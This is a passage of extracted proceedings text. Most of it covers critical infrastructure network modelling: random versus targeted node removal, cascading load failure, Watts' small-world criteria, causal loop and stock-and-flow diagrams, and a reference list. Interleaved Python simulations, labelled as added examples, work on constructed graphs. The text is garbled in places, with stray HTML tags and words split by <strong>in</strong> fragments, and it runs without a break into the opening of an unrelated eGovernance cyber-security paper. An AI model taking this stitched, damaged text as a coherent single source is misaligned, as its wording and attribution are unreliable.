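The contrast between random loss and targeted removal can be checked on a constructed network. The example below is added here and is not code from the paper or from Callaway et al.: it grows a hub-dominated graph by preferential attachment (so a few elements are far more connected than the rest, as in power grids and the internet), then removes 10% of the nodes either at random or by highest degree first, and reports the fraction of the original nodes still inside the largest connected component. Node count, attachment parameter, removal fraction and seed are assumptions chosen for illustration.

```python
"""Random versus targeted node removal on a hub-dominated network (added example)."""
import random
from collections import deque


def preferential_attachment_graph(n, m, rng):
    """Undirected graph with heavy-tailed degrees: each new node links to m distinct
    existing nodes chosen with probability proportional to their current degree."""
    adj = {i: set() for i in range(n)}
    for a in range(m + 1):                  # seed with a complete graph on m+1 nodes
        for b in range(a + 1, m + 1):
            adj[a].add(b)
            adj[b].add(a)
    pool = [node for node in range(m + 1) for _ in range(m)]   # one entry per edge end
    for new in range(m + 1, n):
        chosen = set()
        while len(chosen) < m:
            chosen.add(rng.choice(pool))    # degree-weighted pick
        for t in sorted(chosen):
            adj[new].add(t)
            adj[t].add(new)
            pool.append(t)
        pool.extend([new] * m)
    return adj


def remove_nodes(adj, victims):
    """Copy of the graph with the victim nodes and all their edges removed."""
    gone = set(victims)
    return {u: {v for v in nbrs if v not in gone} for u, nbrs in adj.items() if u not in gone}


def largest_component_fraction(adj, original_size):
    """Share of the original node count still inside the largest connected component (BFS)."""
    seen, best = set(), 0
    for start in adj:
        if start in seen:
            continue
        seen.add(start)
        queue, size = deque([start]), 0
        while queue:
            u = queue.popleft()
            size += 1
            for v in adj[u]:
                if v not in seen:
                    seen.add(v)
                    queue.append(v)
        best = max(best, size)
    return best / original_size


def attack(adj, fraction, strategy, rng):
    """Remove `fraction` of the nodes at random or highest-degree first; return surviving giant component."""
    n = len(adj)
    k = int(n * fraction)
    if strategy == "random":
        victims = rng.sample(sorted(adj), k)
    elif strategy == "targeted":
        victims = sorted(adj, key=lambda u: len(adj[u]), reverse=True)[:k]
    else:
        raise ValueError(f"unknown strategy {strategy!r}")
    return largest_component_fraction(remove_nodes(adj, victims), n)


def compare(n=300, m=2, fraction=0.10, seed=7):
    """Constructed parameters: 300 nodes, 2 links per new node, 10% removed, fixed seed."""
    rng = random.Random(seed)
    g = preferential_attachment_graph(n, m, rng)
    return {
        "intact": largest_component_fraction(g, n),
        "random": attack(g, fraction, "random", rng),
        "targeted": attack(g, fraction, "targeted", rng),
    }


if __name__ == "__main__":
    for name, frac in compare().items():
        print(f"{name:9s} giant component = {frac:.2f} of original nodes")
```

Removing the same number of nodes at random leaves most of the network connected, whereas removing the most connected nodes first strips out a disproportionate share of the edges and strands the low-degree elements that depended on them; the pattern of connection, not the count of elements lost, decides the outcome.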
Therefore, the anatomy of the network is important because structure affects function: the topology of a social network will affect the spread of information or disease; likewise, the topology of an electrical power grid will affect the robustness and stability of the transmission system and the availability of supply (Strogatz 2001). Many such network systems exist widely in the modern world and are evident as differing categories of network systems with differing functions, but all serve to link together those elements necessary to achieve the greater goal.
6. Network system types
In achieving their common goal, the nature of networks and their type represent the linkages between differing system entities, which likewise have a vested interest in cooperating together to achieve the greater goal.
There are principally four loose categories of networks (Newman 2003):
1. Social networks consist of a set of people or groups of people with some pattern of contacts or interactions between them.
2. Information networks are sometimes called knowledge networks. The classic example of an information network is the network of citations between academic papers.
3. Technological networks are man-made networks typically designed for the distribution of some commodity or resource, such as electricity or information. The electric power grid is a prime example, as are the telephone network and the underlying telecommunication infrastructure.
4. Biological networks represent systems in nature, and perhaps the classic example of a biological network is the network of metabolic pathways, which is a representation of metabolic substrates and products with connections joining them if a known metabolic reaction exists that acts on the given substrate and produces the given product.
The common characteristic of these systems is that when a network is carrying a particular resource (friendship, data, electricity or biological substrate), the nodes of the network experience a load, and in normal circumstances the magnitude of the load does not exceed the capacity of the node. Unfortunately, failures tend to cascade in a network environment: if a heavily loaded node is lost, then its load (i.e. the flow passing through it) is redistributed to other functional nodes within the network. However, this redistribution may cause other nodes to exceed their load capacity, causing them to fail too, thereby propagating the failure until it cascades across the network and all network nodes fail. Even where an overloaded node does not fail outright, protection mechanisms shut it down anyway, to prevent a node failure from propagating throughout the network and cascading across the entire network (Newth & Ash 2005). Normally network systems can cope with load changes and adapt in a limited manner to address problems of load distribution, although they are not strictly adaptive or necessarily totally autonomous systems.
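The load-redistribution cascade described above can be simulated directly. The code below is an added example, not the Newth & Ash model or any code from the paper: on a constructed topology (three hub nodes in a ring, each feeding three leaf nodes) every node carries a normal load proportional to its degree and trips when pushed beyond capacity = (1 + tolerance) x normal load, the tolerance margin standing in for the protection setting. Losing a node hands its load equally to its surviving neighbours, a node with no surviving neighbour sheds its load, and tripped nodes are processed in turn until nothing else is over capacity. Degree-as-load and the tolerance values are assumptions.

```python
"""Load-redistribution cascade on a constructed hub-and-spoke network (added example)."""
from collections import deque


def build_network():
    """Constructed topology: three hubs H1..H3 in a ring, each feeding three leaf nodes Hk-1..Hk-3."""
    adj = {}

    def link(u, v):
        adj.setdefault(u, set()).add(v)
        adj.setdefault(v, set()).add(u)

    hubs = ["H1", "H2", "H3"]
    for i, h in enumerate(hubs):
        link(h, hubs[(i + 1) % len(hubs)])   # hub ring
        for k in range(1, 4):
            link(h, f"{h}-{k}")             # spokes
    return adj


def normal_loads(adj):
    """Load carried in normal operation; degree is used as a simple proxy for the flow through a node."""
    return {u: float(len(adj[u])) for u in adj}


def cascade(adj, first_failure, tolerance):
    """Remove `first_failure`, hand its load equally to surviving neighbours, and trip every node
    pushed over capacity = (1 + tolerance) * normal load. Returns the failed nodes in order."""
    load = normal_loads(adj)
    capacity = {u: load[u] * (1.0 + tolerance) for u in adj}
    alive = set(adj)
    failed = []
    pending = deque([first_failure])
    while pending:
        u = pending.popleft()
        if u not in alive:
            continue                        # already tripped earlier in this cascade
        alive.discard(u)
        failed.append(u)
        receivers = [v for v in adj[u] if v in alive]
        if receivers:                       # no live neighbour: the load is shed, not redistributed
            share = load[u] / len(receivers)
            for v in receivers:
                load[v] += share
        load[u] = 0.0
        for v in receivers:
            if load[v] > capacity[v] and v not in pending:
                pending.append(v)           # protection trips the overloaded node rather than letting it fail destructively
    return failed


def scenarios(tolerances=(0.1, 0.5)):
    """Cascade size for a hub-first and a leaf-first failure at each (constructed) tolerance margin."""
    adj = build_network()
    return {(start, tol): len(cascade(adj, start, tol))
            for tol in tolerances for start in ("H1", "H1-1")}


if __name__ == "__main__":
    total = len(build_network())
    for (start, tol), lost in scenarios().items():
        print(f"first failure {start:5s} tolerance {tol:.1f}: {lost:2d} of {total} nodes lost")
```

With a 50% margin the loss of hub H1 takes its three leaves with it and stops there, while the loss of a single leaf is absorbed by its hub. With only a 10% margin either starting point, hub or leaf, brings down all twelve nodes: the redistributed load trips the neighbouring hubs, their loads are passed on in turn, and the cascade runs until nothing is left, which is exactly the failure mode the paragraph warns of.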
For example, large-scale interconnected infrastructures such as telecommunications networks and the internet are complex adaptive systems. These infrastructures are vastly more adaptive and dynamic in comparison to their predecessors and consist of large numbers of diverse components and participants of differing form, function and capability (Herder & Verwater-Lukszo 2006). Additionally, these infrastructure systems exhibit characteristic unstable coherence and resilience in spite of environmental disruptions or central governance (North et al 2002), and go a long way towards being resilient systems.
Furthermore from the networked system perspective, the research of Watts (2004) draws together the<br />
analysis and modell<strong>in</strong>g of networks <strong>in</strong>corporat<strong>in</strong>g dynamic features of physical systems, where their<br />
<strong>in</strong>teractions are characterised as neither entirely ordered or completely random, but tend to exhibit<br />
properties of both. The premise of this network structure criteria is that networks are: characterised as a<br />
large number of connected elements; the network is sparse <strong>in</strong> structure where each element is connected<br />
to only an average but not all other elements of the network; the network is decentralised and there is no<br />
dom<strong>in</strong>ate central po<strong>in</strong>t of connection and f<strong>in</strong>ally the network is clustered where there is some degree of<br />
overlapp<strong>in</strong>g connection between elements with<strong>in</strong> neighbour<strong>in</strong>g system networks clusters (Watts 1999a).<br />
The significance of this view of critical <strong>in</strong>frastructure systems is that it characterises to an extent the<br />
structure of these systems and their <strong>in</strong>ter-connections. This then forms the basis for further research to<br />
apply this to the topology of network systems and to model the relational and <strong>in</strong>fluential aspects of critical<br />
<strong>in</strong>frastructure <strong>in</strong>terconnection.<br />
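To make the four structural criteria listed above measurable, the following Python script, added here and not part of Pye and Warren's paper or of Watts' work, computes them for two constructed graphs: a ring lattice in which every element is linked to its four nearest neighbours (the ordered starting point of Watts' small-world construction) and a star with a single hub. The graph construction, the function names and the way each criterion is reduced to a number are my own assumptions.<br />

```python
from itertools import combinations
from typing import Dict, Set

Graph = Dict[int, Set[int]]   # undirected adjacency sets, constructed in-line below


def ring_lattice(n: int, k: int) -> Graph:
    """Constructed sample: n elements, each linked to its k nearest neighbours
    (k/2 on either side around the ring)."""
    adj: Graph = {i: set() for i in range(n)}
    for i in range(n):
        for d in range(1, k // 2 + 1):
            j = (i + d) % n
            adj[i].add(j)
            adj[j].add(i)
    return adj


def star(n: int) -> Graph:
    """Constructed contrast case: one hub connected to every other element."""
    adj: Graph = {i: set() for i in range(n)}
    for i in range(1, n):
        adj[0].add(i)
        adj[i].add(0)
    return adj


def average_degree(adj: Graph) -> float:
    return sum(len(nbrs) for nbrs in adj.values()) / len(adj)


def density(adj: Graph) -> float:
    """Fraction of all possible links that are present; 'sparse' means far below 1."""
    return average_degree(adj) / (len(adj) - 1)


def max_degree_share(adj: Graph) -> float:
    """Degree of the best-connected element as a fraction of all other elements;
    1.0 means one element is a dominant central point of connection."""
    return max(len(nbrs) for nbrs in adj.values()) / (len(adj) - 1)


def local_clustering(adj: Graph, v: int) -> float:
    """Fraction of an element's neighbour pairs that are themselves linked
    (the overlapping connection within a cluster)."""
    nbrs = adj[v]
    if len(nbrs) < 2:
        return 0.0
    linked = sum(1 for a, b in combinations(nbrs, 2) if b in adj[a])
    return linked / (len(nbrs) * (len(nbrs) - 1) / 2)


def average_clustering(adj: Graph) -> float:
    return sum(local_clustering(adj, v) for v in adj) / len(adj)


def watts_profile(adj: Graph) -> Dict[str, float]:
    """Summarise the four criteria: size, sparsity, (de)centralisation, clustering."""
    return {
        "nodes": len(adj),
        "density": density(adj),
        "max_degree_share": max_degree_share(adj),
        "clustering": average_clustering(adj),
    }


if __name__ == "__main__":
    for name, g in (("ring lattice", ring_lattice(12, 4)), ("star", star(12))):
        print(name, watts_profile(g))
```

For the 12-element ring the density and the largest degree share are both 4/11, and the average clustering is 0.5, so it is sparse, decentralised and clustered as the criteria require; the star has the same size but a degree share of 1.0 and a clustering of 0.0, which is the centralised shape the criteria exclude.<br />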
7. Modelling system relationships<br />
The primary intention of system modelling is to utilise conceptual modelling as a means of facilitating the<br />
comprehension of patterns of change, functionality and dynamic behaviours that a system exhibits, and to<br />
identify the conditions that cause systems to remain stable or become unstable. Furthermore, through<br />
experimentation applied to system model parameters and characteristics, the knowledge derived can<br />
suggest what may or may not translate into the real-world system situation. However, it is<br />
important to be mindful that the interpretation process of translating physical systems and information into<br />
various model elements requires persistence and remains an inexact process, but applied trial and error<br />
and experiential judgement remain valid approaches to model development (Stacey 1996).<br />
7.1 System dynamics, the causal modelling approach<br />
In this example a small business system process illustrates the dynamic characteristics of a simple<br />
business situation in relational terms, utilising a causal loop diagram to represent the dynamics of the<br />
system process. The example models a simple advertising premise for the sale of a durable product, and<br />
the initial assumption is that there is a pool of Potential Customers who may become Actual Customers<br />
through product sales. As Figure 2 depicts, Potential Customers and sales are connected via a negative<br />
feedback loop with the goal of reducing Potential Customers to zero. However, after an advertising<br />
campaign it is reasonable to assume that the greater the number of Potential Customers, the greater the number<br />
of sales generated, as indicated by the positive (+) arrow between Potential Customers and sales.<br />
Similarly, greater sales reduce the number of Potential Customers (as they are converted to Actual<br />
Customers by sales) and this is shown by the negative (-) arrow from sales to Potential Customers. In<br />
this case, the causal loop diagram in Figure 2 is a negative feedback loop because of the odd number of<br />
negative links in the feedback loop between Potential Customers and sales (Kirkwood 2005a).<br />
Figure 2: Advertising example causal loop diagram (Kirkwood 2005a)<br />
The conclusion drawn from the diagram modelling this dynamic process is the obvious insight that the<br />
number of sales will reduce to zero when the number of Potential Customers reaches zero. This simply<br />
illustrates how a causal loop diagram can model a dynamic system process; however, the insight gained<br />
here would not be particularly useful, as there is no information regarding the rate at which the number of<br />
Potential Customers would diminish in this case (Kirkwood 2005a).<br />
The causal loop approach is particularly useful for representing the dynamic and changeable nature of<br />
system and process relationships that are typically difficult to describe verbally, because normal language<br />
presents interrelations in linear cause and effect chains, while Figure 2 shows that in the actual system<br />
there are circular chains of cause and effect (ibid). Furthermore, the modelling of dynamic systems<br />
incorporating greater system complexity and interaction together with additional system component<br />
relationships is possible with causal loop diagrams, and the following example illustrates this further and<br />
explains the notation used.<br />
7.2 Causal loop diagram notations<br />
The causal loop diagram in Figure 3 is a conceptual model representation of the systematic process of<br />
filling a glass of water. This diagram includes elements and arrows (the causal links) linking the various<br />
elements together, and includes either a positive (+) or negative (-) sign on each link to indicate the<br />
following intentions (Kirkwood 2005b):<br />
A causal link from one element A to another B is positive (+) if either A adds to B or a change in A<br />
produces a change in B in the same direction.<br />
A causal link from one element A to another B is negative (-) if either A subtracts from B or a change<br />
in A produces a change in B in the opposite direction.<br />
The model representing the filling of a glass of water example utilises the modelling notation as illustrated in<br />
Figure 3.<br />
Figure 3: Causal loop diagram notations (Kirkwood 2005b)<br />
Initially, to describe the model, if the Faucet Position is increased then the Water Flow increases, and<br />
therefore the causal link (arrow) is positive (+). Similarly, when the Water Flow increases then the Water<br />
Level in the glass will increase, and therefore the causal link between these two elements is positive (+)<br />
too. The next element is the Gap, and this signifies the difference between the Desired Water Level<br />
element and the actual Water Level (i.e. Gap equals Desired Water Level minus actual Water Level).<br />
From this it follows that an increase in Water Level decreases the Gap, and this is a negative (-) causal<br />
link. Finally, to complete the causal link back to the Faucet Position, a greater value for the Gap logically<br />
leads to an increase in Faucet Position, which is a positive (+) causal link. Remember, though, that the<br />
additional causal link shown in the diagram from the Desired Water Level to the Gap element models<br />
an existing external influence on the system process; from the explanation given above, the influence<br />
is in the same direction along this causal link and it is therefore a positive (+) causal link (Kirkwood 2005b).<br />
The sign of a particular loop, referring to the whole feedback system process, is determined by counting<br />
the number of minus (-) signs on all the causal links making up the entire loop. More specifically:<br />
A feedback loop is positive, and is denoted by a plus (+) sign in parentheses, if the loop contains an even<br />
number of negative causal links.<br />
A feedback loop is negative, and is denoted by a minus (-) sign in parentheses, if the loop contains an odd<br />
number of negative causal links.<br />
In the Figure 3 example, the diagram represents a single causal feedback loop with only one negative sign on<br />
its causal links, and hence an odd number of negative signs. Therefore, in the centre of the loop<br />
diagram the negative (-) sign in parentheses is accompanied by a small looping arrow to indicate clearly that the<br />
sign is referring to the whole loop (Kirkwood 2005b).<br />
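The parity rule just stated can be applied mechanically once a diagram is written down as a list of signed links. The Python below is an added example, not code from the paper or from Kirkwood: it transcribes the Figure 3 links (including the external Desired Water Level influence) and the Figure 2 advertising loop as (source, target, sign) triples, enumerates every feedback loop in the diagram, and labels each loop by counting its negative links. The triple encoding and the function names are my own.<br />

```python
from typing import Dict, List, Tuple

Link = Tuple[str, str, str]  # (source element, target element, "+" or "-")

# Figure 3 (filling a glass of water), transcribed from the description above.
FIGURE_3_LINKS: List[Link] = [
    ("Faucet Position", "Water Flow", "+"),
    ("Water Flow", "Water Level", "+"),
    ("Water Level", "Gap", "-"),
    ("Gap", "Faucet Position", "+"),
    ("Desired Water Level", "Gap", "+"),  # external influence: feeds the loop but is not on it
]

# Figure 2 (advertising example).
FIGURE_2_LINKS: List[Link] = [
    ("Potential Customers", "sales", "+"),
    ("sales", "Potential Customers", "-"),
]


def find_loops(links: List[Link]) -> List[List[str]]:
    """Enumerate the elementary feedback loops in the diagram. Each loop is reported
    once, listed from its alphabetically smallest element, so rotations of the same
    loop are not reported again."""
    succ: Dict[str, List[str]] = {}
    for src, dst, _ in links:
        succ.setdefault(src, []).append(dst)
        succ.setdefault(dst, [])
    loops: List[List[str]] = []

    def walk(start: str, node: str, path: List[str]) -> None:
        for nxt in succ[node]:
            if nxt == start:
                loops.append(list(path))
            elif nxt > start and nxt not in path:
                path.append(nxt)
                walk(start, nxt, path)
                path.pop()

    for start in sorted(succ):
        walk(start, start, [start])
    return loops


def loop_polarity(links: List[Link], loop: List[str]) -> str:
    """Kirkwood's rule: an odd number of negative links gives a negative (balancing)
    loop, an even number a positive (reinforcing) loop."""
    sign = {(src, dst): pol for src, dst, pol in links}
    negatives = 0
    for i, node in enumerate(loop):
        # KeyError here means the loop uses a link that is not in the diagram
        pol = sign[(node, loop[(i + 1) % len(loop)])]
        if pol == "-":
            negatives += 1
    return "-" if negatives % 2 else "+"


def classify_loops(links: List[Link]) -> Dict[Tuple[str, ...], str]:
    """Map each loop (element names in causal order) to its sign."""
    return {tuple(loop): loop_polarity(links, loop) for loop in find_loops(links)}


if __name__ == "__main__":
    for name, diagram in (("Figure 2", FIGURE_2_LINKS), ("Figure 3", FIGURE_3_LINKS)):
        for loop, sign in classify_loops(diagram).items():
            print(f"{name}: ({sign}) " + " -> ".join(loop))
```

Run stand-alone it reports one loop per figure, each negative: Figure 3 has exactly one minus sign on its four links, and the Desired Water Level link is correctly left out of the loop because nothing feeds back into it.<br />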
The causal loop diagram modelling approach may prove applicable for modelling the inter-relationships<br />
between critical infrastructure systems and warrants further investigation. However, this requires further<br />
research and application in the context of modelling critical infrastructure system relationships to judge its<br />
effectiveness.<br />
7.3 Stock and flow modelling approach<br />
Another form of dynamic system modelling that is growing in popularity, particularly within business, is the<br />
stock and flow diagram, whose notation consists of three different types of elements, namely stocks,<br />
flows and information. The three elements together in a diagram graphically represent any dynamic<br />
process that may be apparent in any business and therefore can be utilised to represent the<br />
characteristics of such processes and illustrate the relationship among variables that have the potential to<br />
change over time (Kirkwood 2005a).<br />
Figure 4 illustrates an example of a very simple stock and flow diagram with the three elements Casual<br />
Staff, sales and Permanent Staff, which models the structure of the business process concerning the rate<br />
at which Casual Staff numbers reduce to zero, as the number of Permanent Staff required is dictated by<br />
the flow of sales.<br />
Figure 4: Example stock and flow diagram (Kirkwood 2005c)<br />
The two variables illustrated inside the rectangles are each called a stock, level or<br />
accumulation. The variable sales is shown next to the ‘butterfly valve’ or ‘bow tie’ symbol, and this type of<br />
variable is known as a flow or rate; the two lines through the butterfly valve look like a pipe, with the<br />
valve controlling the flow. The premise of the above figure is that it represents the flow of Casual Staff<br />
towards Permanent Staff, with the rate of flow controlled by the sales valve; this is the key idea behind<br />
the difference between stock and flow. Therefore, a stock represents an accumulation of something and<br />
a flow is the movement of something from one stock to another (Kirkwood 2005c).<br />
The final element of Figure 4 is the information link, represented as a curved arrow, and this notation<br />
represents the value of Casual Staff influencing the value of sales. Additionally, and of equal importance,<br />
is the lack of an information arrow from Permanent Staff to sales, which illustrates that information<br />
regarding the value of Permanent Staff has no influence over the value of sales (ibid).<br />
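The point made in 7.1, that a causal loop diagram says nothing about the rate at which a quantity diminishes, is exactly what the stock and flow form supplies. The Python below is an added example, not code from the paper or from Kirkwood; it simulates the Figure 4 structure numerically with the two stocks, the sales flow draining one into the other, and a single information link from Casual Staff to sales (and none from Permanent Staff). The conversion fraction, the initial values and the step size are constructed assumptions, not figures from the paper.<br />

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class State:
    t: float
    casual: float      # stock: Casual Staff
    permanent: float   # stock: Permanent Staff


def sales_rate(casual: float, conversion_fraction: float) -> float:
    """The 'sales' flow (the butterfly valve). Its only input is the Casual Staff stock,
    matching the single curved information arrow in Figure 4; Permanent Staff is
    deliberately not a parameter because the diagram has no information link from it."""
    return conversion_fraction * casual


def simulate(casual0: float, permanent0: float, conversion_fraction: float,
             steps: int, dt: float = 1.0) -> List[State]:
    """Step the two stocks forward in time. Whatever leaves Casual Staff through the
    sales pipe arrives in Permanent Staff, so the total is conserved."""
    states = [State(0.0, casual0, permanent0)]
    for _ in range(steps):
        s = states[-1]
        moved = sales_rate(s.casual, conversion_fraction) * dt
        moved = min(moved, s.casual)  # a stock cannot go negative: the pipe drains only what is there
        states.append(State(s.t + dt, s.casual - moved, s.permanent + moved))
    return states


def steps_until_below(states: List[State], threshold: float) -> Optional[int]:
    """Index of the first step at which Casual Staff has fallen below the threshold,
    i.e. the rate information a causal loop diagram alone cannot give."""
    for i, s in enumerate(states):
        if s.casual < threshold:
            return i
    return None


def is_conserved(states: List[State], tol: float = 1e-9) -> bool:
    """Sanity check on the model: staff only move between the two stocks."""
    total = states[0].casual + states[0].permanent
    return all(abs(s.casual + s.permanent - total) < tol for s in states)


if __name__ == "__main__":
    run = simulate(casual0=100.0, permanent0=0.0, conversion_fraction=0.1, steps=60)
    for s in run[:5]:
        print(f"t={s.t:4.0f}  casual={s.casual:7.2f}  permanent={s.permanent:7.2f}")
    print("casual < 1 after", steps_until_below(run, 1.0), "steps; conserved:", is_conserved(run))
```

With a constructed conversion fraction of 0.1 per step and 100 casual staff to start, the stock drains geometrically (90, 81, 72.9, ...) and falls below one person after 44 steps; changing the fraction changes that number, which is the rate answer the earlier causal loop model could not provide.<br />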
7.4 Stock and flow appraisal<br />
The purpose of the stock and flow diagram is to depict the process changes and how the elements and<br />
the structure of these processes interact together to bring about change. This form of modelling focuses<br />
on the elements that make up the process (sometimes likened to the components of the system) and<br />
how the performance of the process changes over time, and forms the basis of studying the dynamics of a<br />
simple process using stock and flow diagrams.<br />
The underlying weakness of stock and flow diagrams is that they can only deliver a simplistic<br />
representation of a simple process within a defined process boundary. Unfortunately, from the<br />
perspective of modelling examples of critical infrastructure systems, for instance, stock and flow diagrams<br />
are not readily applicable to this type of system modelling due to the size and complexity of the systems.<br />
The other important issue is the scalability potential of stock and flow diagrams with regard to these<br />
systems, as they tend to become difficult to interpret due to the diagrams' added complexity in depicting<br />
the logical interconnection, processes and dependency relationships of critical infrastructure systems. It<br />
appears that stock and flow diagrams are better suited to modelling less complex system processes with<br />
clearly defined boundaries, and are not necessarily well suited to modelling multiple interconnected and<br />
large complex critical infrastructure systems from a relational perspective.<br />
8. Conclusions<br />
As Bentley (2006) intimates, critical infrastructure systems tend to be interdependent and even<br />
interconnected, and system failures – be it through natural disaster, terrorism or poor management – can<br />
bring entire communities and their industries and utilities to a grinding halt. Therefore, the ability to<br />
analyse and critique the relational aspects of critical infrastructure systems, together with modelling these<br />
system relationships, offers an avenue for assessing critical infrastructure system security, identifying<br />
vulnerabilities and locating inherent weaknesses in system availability and service supply.<br />
The research of Watts (1999b) and its interpretation of the interconnections between systems and the<br />
structure of social networks presents an interesting approach that could provide insight when applied to<br />
critical infrastructure systems. Although this is not applied here, it represents an opportunity for future<br />
research in this area, particularly in terms of identifying the integral interconnections between systems.<br />
Additionally, this offers the opportunity, through the identification of these integral interconnections<br />
between critical infrastructure systems, to utilise the causal modelling approach to interpret the influential<br />
aspects of relationships between critical infrastructure systems. Causal loop diagrams offer a flexible<br />
‘soft’ approach to enable an illustrative representation of critical infrastructure system dependency and<br />
interdependency relationships that is worthy of future research.<br />
References<br />
Bentley A. (2006) 'Infrastructure: Critical Mass', CSIRO Solve, No.7.<br />
Callaway S.S., Newman M.E.J., Strogatz S.H. & Watts D.J. (2000) 'Network Robustness and Fragility: Percolation on<br />
Random Graphs', Physical Review Letters, Vol.85, pp. 54-68.<br />
Caulfield C.W. & Maj S.P. (2002) 'A Case for System Dynamics', Global Journal of Engineering Education, Vol.6,<br />
No.1, pp. 34.<br />
Checkland P. (2000) 'Soft Systems Methodology: A Thirty Year Retrospective', Systems Research and Behavioural<br />
Science, John Wiley & Sons Ltd, Vol.17, pp. S11-S58.<br />
Christensen C. & Albert R. (2007) 'Using graph Concepts to understand the organisation of complex systems',<br />
International Journal of Bifurcation and Chaos, Vol.17, No.7.<br />
Finnigan J. (2005) 'The Science of Complex Systems', Australian Science, pp. 32-34.<br />
Forrester J.W. (1991) 'System Dynamics and the Lessons of 35 Years', in The Systemic Basis of Policy Making in<br />
the 1990s, De Greene K.B. (ed.).<br />
Forrester J.W. (1994) 'System dynamics, systems thinking, and soft OR', System Dynamics Review, Vol.10, No.2-3,<br />
pp. 245-256.<br />
Forrester J.W. (1995) Counterintuitive Behavior of Social Systems.<br />
Forrester J.W. (1998) Designing the Future, University of Seville, Seville, Spain.<br />
Herder P.M. & Verwater-Lukszo Z. (2006) 'Towards next generation infrastructures: an introduction to the<br />
contributions in this issue', International Journal of Critical Infrastructures, Vol.2, No.2/3, pp. 113-120.<br />
Jensen E. & Brehmer B. (2003) 'Understanding and Control of a Simple Dynamic System', System Dynamics<br />
Review, Vol.19, No.2, pp. 119-137.<br />
Kirkwood C.W. (2005a) 'A Modelling Approach', [online], Arizona State University,<br />
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/ch-2.pdf.<br />
Kirkwood C.W. (2005b) 'System Behaviour and Causal Loop Diagrams', [online], Arizona State University,<br />
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/ch-1.pdf.<br />
Kirkwood C.W. (2005c) 'System Dynamics Methods: A Quick Introduction', [online], Arizona State University,<br />
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/SDIntro.htm.<br />
Luna-Reyes L.F. & Andersen D.L. (2003) 'Collecting and analyzing qualitative data for system dynamics: methods<br />
and models', System Dynamics Review, Vol.19, No.4, pp. 271-296.<br />
Maani K.E. & Cavana R.Y. (2000) Systems Thinking and Modelling. Understanding Change and Complexity,<br />
Prentice Hall, Auckland, NZ.<br />
Newman M.E.J. (2003) 'The Structure and Function of Complex Networks', SIAM (Society for Industrial and Applied<br />
Mathematics) Review, Vol.45, No.2, pp. 167-256.<br />
Newth D. & Ash J. (2005) 'Evolving cascading failure resilience in complex networks', Complexity International,<br />
Vol.11.<br />
North M., Macal C., Thomas W.H., Miller D. & Peerenboom J. (2002) 'More Than Just Wires: Applying Complexity<br />
Theory to Communication Network Assurance', in 6th World Multiconference on Systemics, Cybernetics, and<br />
Informatics (SCI 2002), Orlando FL USA.<br />
Parrott L. & Kok R. (2000) 'Incorporating Complexity in Ecosystem Modelling', Complexity International, Vol.7.<br />
Schaffernicht M. (2006) 'Detecting and Monitoring Change in Models', System Dynamics Review, Vol.22, No.1, pp.<br />
73-88.<br />
SDS (2006) 'What is System Dynamics', System Dynamics Society, [online], University of Albany, State University of<br />
New York, www.albany.edu/cpr/sds/.<br />
Senge P.M. (1990) The fifth discipline: the art and practice of the learning organisation, Random House Australia,<br />
Milsons Point, NSW.<br />
Stacey R.D. (1996) Strategic management & organisational dynamics, 2nd Edition, Pitman Publishing, London, UK.<br />
Strogatz S.H. (2001) 'Exploring Complex Networks', Nature, Vol.410, pp. 268-276.<br />
Warren K. (2005) 'Improving Strategic Management with the Fundamental Principles of System Dynamics', System<br />
Dynamics Review, Vol.21, No.4, pp. 329-350.<br />
Watts D.J. (1999a) 'Networks, Dynamics, and Small-World Phenomenon', The American Journal of Sociology,<br />
Vol.105, No.2, pp. 493-527.<br />
Watts D.J. (1999b) Small Worlds: The Dynamics of Networks between Order and Randomness, Princeton University<br />
Press, Princeton, NJ, USA.<br />
Watts D.J. (2000) 'A simple model of fads and cascading failures', [online],<br />
www.santafe.edu/research/publications/workingpapers/00-12-062.pdf.<br />
Watts D.J. (2004) 'The "New" Science of Networks', Annual Review of Sociology, Vol.30, pp. 243-270.<br />
A Study on Cyber Secured eGovernance in an Educational<br />
Institute: Performance and User Satisfaction<br />
Kasi Raju<br />
IIT Madras, Chennai, India<br />
kasiraju@cse.iitm.ac.in<br />
Abstract: It is widely acknowledged that eGovernance can be immensely useful in improving the efficiency of the functioning of<br />
the government and improving citizen service delivery. There are many areas of concern where the performance of<br />
eGovernance can be improved. A centralized security management system is installed for the secured access of the<br />
eGovernance service. The eGovernance approach will enable governments to achieve efficiency gains and improve<br />
service delivery levels, raise citizen satisfaction with government services, and enhance the quality of life of citizens. This<br />
study attempts to find the performance of, and user satisfaction with, eGovernance implemented in an educational<br />
institute. Further, the concentration of the analysis is to find what other areas can be brought under the eGovernance<br />
system. Studies have been made of the existing security measures deployed. From these studies, it was found<br />
that only computer science department students were aware of cyber crime and cyber security. Avoiding paperwork,<br />
24x7 access and transparency were pointed out as advantages of the eGovernance system. Many respondents<br />
expressed concern about the security of their information both in transit and in the databases of the<br />
eGovernance information servers. The aim of this study is to find the performance expectancy and evaluate user<br />
satisfaction in an eGovernance system and to provide secured eGovernance services by hardening the cyber<br />
infrastructures.<br />
Keywords: eGovernance, cyber crime, cyber warfare, cyber security, stuxnet, DDOS, BAR, DCC, stratagem<br />
1. Introduction<br />
UNESCO defines eGovernance as ‘the public sector’s use of information and communication<br />
technologies with the aim of improving information and service delivery, encouraging citizen participation<br />
in the decision-making process and making the government more accountable, transparent and<br />
effective’. While Governance refers to ‘the exercise of political, economic and administrative authority in<br />
the management of a country’s affairs, including citizens’ articulation of their interests and exercise of<br />
their legal rights and obligations’, eGovernance may be understood ‘as the performance of this<br />
governance via the electronic medium in order to facilitate an efficient, speedy and transparent process of<br />
disseminating information to the public, and other agencies, and for performing government<br />
administration activities’. *<br />
2. Literature review of eGovernance<br />
eGovernance evaluation: The theoretical progression of eGovernment in any country or state is along<br />
four stages, which indicate the extent of benefits that the stakeholders get through the eGovernment<br />
projects prevalent in that country or state. These are represented schematically in the following figure.<br />
Figure 1: eGovernance evaluation (source: J.Satyanarayana, EGovernment: The Science of Possible,<br />
Prentice-Hall of India Private Limited, p.20) #<br />
3. eGovernment stages @<br />
This section presents a summary of different stage-models of eGovernment evolution. It is important to<br />
clarify that in reality these stages are not necessarily mutually exclusive or progressive.<br />
Initial Presence<br />
This happens when a country, state, or local government has a formal presence on the Internet through a<br />
limited number of individual governmental pages (mostly developed by single governmental agencies).<br />
Governments in this stage normally offer static information about agencies and some of the services they<br />
provide to citizens and private organizations.<br />
Extended Presence<br />
